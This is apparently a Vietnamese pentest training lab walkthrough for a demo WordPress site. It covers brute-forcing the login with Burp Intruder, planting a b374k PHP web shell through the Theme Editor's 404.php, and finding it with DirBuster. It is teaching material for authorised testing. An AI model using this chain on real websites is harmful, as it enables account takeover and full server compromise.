- Điều hướng đến Applications -> Pentesting -> Web Application Analysis / Web Application Proxies và nhấp vào burpsuite để khởi chạy ứng dụng.
(Hình ảnh màn hình)
- Một cửa sổ bật lên yêu cầu mật khẩu của bạn để thực hiện tác vụ quản trị sẽ xuất hiện, nhập toor và nhấp vào OK.
(Hình ảnh màn hình)
- BURPSUITE COMMUNITY EDITION xuất hiện, có thể mất một chút thời gian tải, hiển thị License Agreement. Nhấp vào nút I Accept để chấp nhận thỏa thuận cấp phép.
Cửa sổ bật lên Burp Suite Community Edition xuất hiện, nhấp vào OK.
(Hình ảnh màn hình)
- Cửa sổ Burp Suite projects xuất hiện với nút radio Temporary project được chọn theo mặc định. Nhấp vào Next.
Một cửa sổ bật lên An update is available xuất hiện, nhấp vào Close.
(Hình ảnh màn hình)
- Cửa sổ cấu hình dự án Burp Suite xuất hiện, nhấp vào nút radio Use Burp defaults, vì chúng ta sẽ sử dụng cấu hình dự án mặc định để chạy ứng dụng. Nhấp vào Start Burp.
(Hình ảnh màn hình)
- Cửa sổ chính Burp Suite xuất hiện, nhấp vào tab Proxy.
(Hình ảnh màn hình Burp Suite)
- Cửa sổ Burp Suite Proxy xuất hiện, hiển thị phần Intercept. Đảm bảo rằng nút Intercept is on được kích hoạt.
(Hình ảnh màn hình)
- Bây giờ, phóng to trình duyệt web và chuyển sang trang đăng nhập WordPress. Chúng ta không biết mật khẩu để đăng nhập. Vì vậy, hãy nhập thông tin đăng nhập ngẫu nhiên và nhấp vào Log In.
Tên người dùng và mật khẩu được sử dụng trong bài thực hành này là test và guess.
(Hình ảnh màn hình hiển thị trang đăng nhập với tên người dùng và mật khẩu)
- Chuyển sang Burp Suite. Bạn sẽ thấy rằng ứng dụng đã chặn yêu cầu đăng nhập. Chúng ta sẽ thử một tập hợp tên người dùng và mật khẩu trên các trường tên người dùng và mật khẩu của yêu cầu này. Để thử, nhấp chuột phải vào yêu cầu và nhấp vào tùy chọn Send to Intruder từ menu ngữ cảnh.
(Hình ảnh màn hình hiển thị yêu cầu bị chặn trong Burp Suite)
- Nhấp vào tab Intruder. Cửa sổ Burp Suite Intruder xuất hiện, nhấp vào tab Positions.
(Hình ảnh màn hình Burp Suite Intruder)
- Burp Suite đặt các vị trí mục tiêu theo mặc định. Nhấp vào nút Clear § ở bên phải của phần Payload Positions để xóa các vị trí payload.
(Hình ảnh màn hình)
- Sau khi bạn xóa các vị trí payload, hãy chọn Cluster bomb từ danh sách thả xuống Attack type.
(Hình ảnh màn hình)
- Bây giờ, chúng ta sẽ đặt tên người dùng và mật khẩu làm vị trí payload. Để đặt tên người dùng mà bạn đã nhập trong Nhiệm vụ số 16, hãy tô sáng test và nhấp vào Add §.
(Hình ảnh màn hình)
- Để đặt mật khẩu mà bạn đã nhập trong Nhiệm vụ số 16, hãy tô sáng guess và nhấp vào Add §.
(Hình ảnh màn hình)
- Bây giờ bạn sẽ thấy rằng các vị trí tên người dùng và mật khẩu đã được đặt. Để đặt payload, nhấp vào tab Payloads.
(Hình ảnh màn hình)
- Phần Payloads xuất hiện với Payload set 1 được chọn. Nhấp vào nút Load … trong phần Payload Options [Simple list].
(Hình ảnh màn hình)
- Một cửa sổ bật lên xuất hiện hiển thị cấu trúc tệp. Điều hướng đến home/pentester/Wordlists trong trường Look In, chọn Usernames.txt và nhấp vào Open.
(Hình ảnh màn hình)
- Bạn sẽ thấy rằng các tên người dùng bên trong tệp văn bản được tải trong phần Payload Options [Simple list] như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình)
- Bây giờ, trong phần Payload Sets, chọn 2 từ danh sách thả xuống Payload set. Nhấp vào nút Load … trong phần Payload Options [Simple list].
(Hình ảnh màn hình)
- Một cửa sổ bật lên xuất hiện hiển thị cấu trúc tệp. Điều hướng đến home/pentester/Wordlists trong trường Look In, chọn Passwords.txt và nhấp vào Open.
(Hình ảnh màn hình)
- Bạn sẽ thấy rằng các mật khẩu bên trong tệp văn bản được tải trong phần Payload Options [Simple list] như được hiển thị trong ảnh chụp màn hình. Bây giờ, nhấp vào nút Start attack.
(Hình ảnh màn hình)
- Cửa sổ bật lên Burp Intruder xuất hiện, nhấp vào OK.
(Hình ảnh màn hình)
- Cửa sổ Intruder attack 1 xuất hiện, hiển thị các kết hợp tên người dùng-mật khẩu khác nhau cùng với Length của phản hồi và Status. Đợi 2-3 phút để Burp Suite thử các kết hợp tên người dùng-mật khẩu khác nhau.
(Hình ảnh màn hình)
- Burp Suite thử tất cả các kết hợp tên người dùng-mật khẩu và ghi lại phản hồi cho mỗi yêu cầu được gửi đến trang web WordPress. Độ dài của phản hồi gần như giống nhau đối với tất cả các yêu cầu chứa kết hợp tên người dùng-mật khẩu sai. Khi burp suite thử kết hợp tên người dùng-mật khẩu chính xác trên trang web, độ dài của phản hồi khác rất nhiều so với các phản hồi khác và trạng thái cũng thay đổi tương ứng. Nhấp vào Length trong phần Filter để sắp xếp độ dài của các phản hồi theo thứ tự tăng dần.
(Hình ảnh màn hình)
- Khi nhấp vào Length trong phần Filter, Burp Suite sẽ sắp xếp độ dài của các phản hồi theo thứ tự tăng dần. Độ dài và trạng thái của phản hồi cho kết hợp tên người dùng-mật khẩu mike – prince khác với các phản hồi khác, điều này cho thấy đó là một kết hợp hợp lệ.
(Hình ảnh màn hình)
- Đóng cửa sổ Intruder Attack.
Nếu cửa sổ bật lên Warning xuất hiện, nhấp vào OK.
(Hình ảnh màn hình)
- Truy cập menu Burp và nhấp vào Exit để đóng ứng dụng.
Nếu cửa sổ bật lên Confirm xuất hiện, nhấp vào Yes.
- Bây giờ, hãy mở trình duyệt web Firefox và chuyển sang cửa sổ Preferences. Truy cập Proxy Connection Settings, chọn nút radio Use system proxy settings và nhấp vào OK. Đóng tab Preferences.
(Hình ảnh màn hình hiển thị cài đặt proxy)
- Chuyển sang trang web CPENT Demo và làm mới trang. Trang đăng nhập xuất hiện, nhập mike/prince vào các trường tên người dùng và mật khẩu và nhấp vào Log In.
(Hình ảnh màn hình hiển thị trang đăng nhập)
- Bạn đã đăng nhập thành công vào CPENT Demo Site, có nghĩa là cuộc tấn công từ điển bằng Burp Suite đã thành công.
(Hình ảnh màn hình)
- Bây giờ, chúng ta sẽ tải lên một shell vào ứng dụng web để có quyền truy cập không hạn chế vào máy đang lưu trữ trang web trong bài thực hành tiếp theo.
Trong bài thực hành này, bạn đã học cách thực hiện tấn công từ điển trên ứng dụng web WordPress bằng Burp Suite.
Bài tập 7: Khai thác lỗ hổng ứng dụng Web WordPress bằng cách tải lên shell tùy chỉnh
Kịch bản:
Một số phiên bản cũ hơn của ứng dụng web WordPress cung cấp tùy chọn cho người dùng quản trị để chỉnh sửa chân trang, archive.php và tệp 404.php. Nếu quản trị viên sử dụng thông tin đăng nhập người dùng yếu để đăng nhập và nếu kẻ tấn công có thể bẻ khóa các thông tin đăng nhập đó, thì kẻ tấn công có cơ hội đột nhập vào tài khoản, tải lên shell và có quyền truy cập vào toàn bộ máy chủ đang lưu trữ ứng dụng web.
Là một chuyên gia kiểm tra xâm nhập, bạn cần biết cách tạo shell php tùy chỉnh và xác định các điểm nhập mà bạn có thể tải lên nó.
Bài thực hành này là phần tiếp theo của bài thực hành trước. Trong bài thực hành này, bạn sẽ học cách:
- Tạo shell php tùy chỉnh
- Xác định điểm nhập và chèn mã shell vào đó để có quyền truy cập vào máy chủ
Thời lượng thực hành: 20 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập)
Nếu bạn đã đăng nhập, hãy bỏ qua bước 2.
- Khởi chạy trình duyệt web, nhập URL http://www.cpent.com/wp-login.php vào thanh địa chỉ và nhấn Enter. Trang đăng nhập CPENT Demo Site xuất hiện, nhập tên người dùng và mật khẩu bạn đã nhận được trong bài thực hành trước (mike/prince) và nhấp vào Log In.
(Hình ảnh màn hình)
- Trang web CPENT Demo Site xuất hiện như được hiển thị trong ảnh chụp màn hình. Như chúng ta thấy trong bảng điều khiển, không có plugin nào được cài đặt trên ứng dụng web, có nghĩa là không có vectơ tấn công cụ thể nào để có quyền truy cập vào máy đang lưu trữ ứng dụng. Bây giờ chúng ta sẽ nhắm mục tiêu tệp chủ đề WordPress 404.php từ Theme Editor. Chúng ta có thể cập nhật nội dung của tệp này bằng nội dung của shell, mà chúng ta sẽ chuẩn bị bằng shell b374k.
(Hình ảnh màn hình)
- Bây giờ, chúng ta cần khởi chạy WordPress Theme Editor. Để khởi chạy, di chuột qua menu Appearance trong khung bên trái và nhấp vào Editor.
(Hình ảnh màn hình)
- Cửa sổ Theme Editor xuất hiện, nhấp vào 404 Template trong khung bên phải để chỉnh sửa tệp 404.php.
(Hình ảnh màn hình)
- Nội dung tệp 404 Template xuất hiện, chọn tất cả nội dung trong tệp.
(Hình ảnh màn hình)
- Thu nhỏ trình duyệt web, khởi chạy cửa sổ dòng lệnh, nhập cd b374k-master để thay đổi thư mục thành b374k-master.
(Hình ảnh màn hình terminal)
- Nhập php -f index.php — -o shell.php -s -b -z gzcompress -c 9 và nhấn Enter. Lệnh này tạo ra một shell php như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình terminal)
- Bây giờ, hãy đóng cửa sổ dòng lệnh, điều hướng đến thư mục chính của pentester trên Desktop -> thư mục b374k-master và nhấp đúp vào tệp shell.php.
(Hình ảnh màn hình)
- Tệp shell.php mở ra trong trình soạn thảo văn bản, hiển thị nội dung của tệp. Bạn cần sao chép nội dung này và dán nó vào nội dung tệp của 404.php. Vì vậy, hãy chọn tất cả nội dung và sao chép nó.
(Hình ảnh màn hình)
- Phóng to trình duyệt web và thay thế nội dung của 404 Template bằng nội dung shell.
(Hình ảnh màn hình)
- Bạn sẽ thấy rằng nội dung 404 Template được thay thế bằng nội dung shell. Bây giờ, nhấp vào Update File để cập nhật nội dung của mẫu bằng nội dung của shell.
(Hình ảnh màn hình)
- Bây giờ, nội dung shell được tải lên tệp 404.php thành công trong chủ đề Twentyfifteen. Nếu chúng ta duyệt tệp này, chúng ta sẽ có quyền truy cập shell vào máy đang lưu trữ trang web này. Chúng ta cần biết cấu trúc thư mục để duyệt tệp. Chúng ta sẽ sử dụng công cụ duyệt thư mục DirBuster trong bài thực hành tiếp theo để xác định vị trí thư mục của chủ đề twentyseventeen, nơi lưu trữ 404.php. Thu nhỏ trình duyệt web.
Trong bài thực hành này, bạn đã học cách:
- Tạo shell php tùy chỉnh.
- Xác định điểm nhập và chèn mã shell vào đó để có quyền truy cập vào máy chủ.
Bài tập 8: Duyệt thư mục trang web WordPress bằng DirBuster và truy cập Shell
Kịch bản:
Bài thực hành này là phần tiếp theo của bài thực hành trước.
Trong bài thực hành trước, bạn đã học cách tạo shell và tải lên nó. Điều cần thiết đối với một chuyên gia kiểm tra xâm nhập là xác định cấu trúc thư mục của một ứng dụng web để duyệt chúng và tìm ra xem có bất kỳ thư mục/tệp không cần thiết/nhạy cảm nào có thể duyệt được hay không.
Trong bài thực hành này, bạn sẽ học cách duyệt các thư mục bằng dirbuster, xác định vị trí của shell (đã tải lên trong bài thực hành trước), duyệt nó và có quyền truy cập vào máy chủ.
Thời lượng thực hành: 25 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình)
Nếu bạn đã đăng nhập, hãy bỏ qua bước 2.
- Khi bạn đăng nhập vào máy, hãy khởi chạy cửa sổ dòng lệnh, nhập dirbuster và nhấn Enter.
(Hình ảnh màn hình terminal)
- Cửa sổ chính DirBuster xuất hiện. Nhập http://www.cpent.com vào trường Target URL.
(Hình ảnh màn hình)
- Chọn nút radio Pure Brute Force trong phần Select scanning type, chọn a-z0-9 từ danh sách thả xuống Char set, đặt Min Length thành 1 và Max Length thành 20 và đánh dấu tùy chọn Use Blank Extention, nhập wordpress vào trường Dir to start with.
(Hình ảnh màn hình)
- Nhấp vào nút Start để bắt đầu tấn công brute force.
- DirBuster bắt đầu brute force các thư mục và tệp và hiển thị trạng thái quét trong tab Scan Information như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình)
- Nhấp vào tab Results – List View để xem các tệp và thư mục bị brute force.
(Hình ảnh màn hình)
- Cuộn xuống tab Results – List View. Bạn sẽ thấy một thư mục có tên twentyfifteen, đây có thể là vị trí lưu trữ tệp 404.php.
(Hình ảnh màn hình)
- Nhấp vào tab Results – Tree View để xem cấu trúc thư mục trong dạng cây. Bạn sẽ thấy vị trí của chủ đề twentyseventeen là /wp-content/themes/twentyfifteen/. Do đó, chúng ta sẽ nhập URL http://www.cpent.com/wp-content/themes/twentyfifteen/404.php vào trình duyệt web.
(Hình ảnh màn hình)
- Khởi chạy trình duyệt web, nhập URL http://www.cpent.com/wp-content/themes/twentyfifteen/404.php vào thanh địa chỉ và nhấn Enter.
- Shell b374k được khởi chạy thành công trong trình duyệt web như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình)
- Như vậy, chúng ta đã khởi chạy thành công shell php bằng cách tìm cấu trúc thư mục bằng DirBuster. Đóng tất cả các cửa sổ.
Trong bài thực hành này, bạn đã học cách duyệt các thư mục bằng dirbuster, xác định vị trí của shell, duyệt nó và có quyền truy cập vào máy chủ.





Bình luận về bài viết này